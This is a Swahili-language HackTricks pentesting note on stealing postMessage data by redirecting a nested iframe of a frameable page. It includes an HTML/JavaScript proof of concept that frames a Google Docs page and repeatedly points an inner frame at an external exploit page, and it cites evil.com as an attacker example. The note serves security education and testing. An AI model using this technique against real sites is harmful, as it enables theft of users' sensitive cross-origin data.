hacktricks/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
2024-02-11 02:13:58 +00:00

3.7 KiB

Chukua postmessage kwa kubadilisha eneo la iframe

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Kubadilisha maeneo ya iframes ya watoto

Kulingana na makala hii, ikiwa unaweza kuweka iframe ya ukurasa bila kichwa cha X-Frame ambacho kina iframe nyingine, unaweza kubadilisha eneo la iframe ya mtoto.

Kwa mfano, ikiwa abc.com ina efg.com kama iframe na abc.com haikuwa na kichwa cha X-Frame, ningeweza kubadilisha efg.com kuwa evil.com kwa kutumia, frames.location.

Hii ni muhimu sana katika postMessages kwa sababu ikiwa ukurasa unatuma data nyeti kwa kutumia wildcard kama windowRef.postmessage("","*") inawezekana kubadilisha eneo la iframe inayohusiana (mtoto au mzazi) kwenda eneo linalodhibitiwa na mshambuliaji na kuiba data hiyo.

<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);

function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
</html>
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!